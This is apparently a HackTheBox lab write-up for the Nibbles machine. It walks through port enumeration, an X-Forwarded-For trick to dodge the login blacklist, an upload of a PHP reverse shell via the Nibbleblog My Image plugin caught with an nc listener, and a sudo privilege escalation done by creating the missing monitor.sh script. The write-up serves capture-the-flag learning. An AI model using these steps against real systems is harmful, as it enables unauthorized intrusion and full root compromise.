Machine started with 10.129.6.88 IP.

Enumeration

$ nmap -sSV -p- -oA 1_nmap 10.129.6.88
Starting Nmap 7.95 ( https://nmap.org ) at 2026-05-29 21:51 EDT
Nmap scan report for 10.129.6.88
Host is up (0.040s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • Port 80 - web server - Nibbleblog on Apache 2.4.18
    • source code of website shows a comment <!--/nibbleblog/ directory-->
    • /nibbleblog is a blog with no posts
    • looking at the network tab, /themes, /content, /admin exist that other files are being pulled from. Directory browsing is on for all of them
      • /themes/ - several themes show version supported 4.0 / 4.0.1
      • this version is susceptible to CVE-2015-6967, arbitrary file upload including PHP files
      • "Unrestricted file upload vulnerability in the My Image plugin in Nibbleblog before 4.0.5 allows remote administrators to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in content/private/plugins/my_image/image.php"
      • nibbleblog/content/private/plugins/my_image/image.php 404 not found
      • CVE-2015-6967 shows admin.php?controller=plugins&action=config&plugin=my_image as the exploit path. This appears to work, but requires creds
    • Per the official GitHub, install.php is what configures the site and it saves the password to /content/private/shadow.php
      • attempting to visit /nibbleblog/install.php states it's already installed, as seen in line 32. The script exits, preventing further modification. However, it does point us to the /content/private/config.xml db file, which contains an [email protected] email.
      • /content/private/users.xml shows user username="admin"
      • attempting to visit the shadow.php returns a blank page
    • navigating to /nibbleblog/admin.php. I tried a 5 user/pass combos before my IP was added to the blacklist in /users.xml for 5 minutes. The source code shows get_user_ip() is retrieved as seen below. 
public static function get_user_ip()
{
    if(getenv('HTTP_X_FORWARDED_FOR'))
        $ip = getenv('HTTP_X_FORWARDED_FOR');
    elseif(getenv('HTTP_CLIENT_IP'))
        $ip = getenv('HTTP_CLIENT_IP');
    else
        $ip = getenv('REMOTE_ADDR');

    if(filter_var($ip, FILTER_VALIDATE_IP))
        return $ip;

    return getenv('REMOTE_ADDR');
}
  • We could programatically spoof the HTTP_X_FORWARDED_FOR for brute forcing.
  • Port 22 - ssh - OpenSSH 7.2p2
    • This version appears to be vulnerable to CVE-2016-6210 for username enumeration. This means we can provide a list of usernames and based off timing, determine if the username exists.

Exploitation

  • port 80, /nibbleblog/admin.php allows credentials. admin is username, unknown pwd. Has a blacklist feature that uses IP and will prevent requests for 5 minutes if brute force occurs. Checks HTTP_X_FORWARDED_FOR header first for IP, which can be brute forced
  • I attempted with Burp Suite's Intruder to configure a number payload to increase X-Forwarded-For alongside a second payload for using a wordlist for the password. It did succeed without hitting a lockout, however the solution was even simpler. I took a guess and got lucky by using nibbles.
  • Navigating back to /nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image, uploaded the php-reverse-shell. It is placed under /nibbleblog/content/private/plugins/my_image/image.php
  • started a shell with nc -lvnp 4444 and browsed to the /image.php which connected the shell

Post-Exploitation

  • reverse shell is nibbler under /
  • user.txt found under /home/nibbler/user.txt
  • upgrade the dumb shell to tty 
# after the nc listener has hooked, spawn pseudo shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
# CTRL + Z to bg the reverse shell
echo $TERM                  # notate the result, i.e xterm-256color
stty -a                     # notate the rows and columns
stty raw -echo; fg          # enter tty raw mode (which will glitch the ui)
export TERM=xterm256-color  # use same shell as the $TERM output from #1
stty rows 36 columns 161    # use the rows and column from #2

Priv-esc

  • sudo -l returns (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
  • this dir/script does not exist, so we should be able to create it and sudo to gain root\
cd ~
mkdir personal && cd personal
mkdir stuff && cd stuff
echo "exec bash" > monitor.sh
chmod +x monitor.sh
sudo ./monitor.sh

root

  • root granted
  • flag found under /root/root.txt

Conclusion

Pretty good box! The enumeration phase took me the longest, especially trying to figure out how to get into the admin portal. From there, exploitation and priv esc were super easy. Nice first machine back on HackTheBox!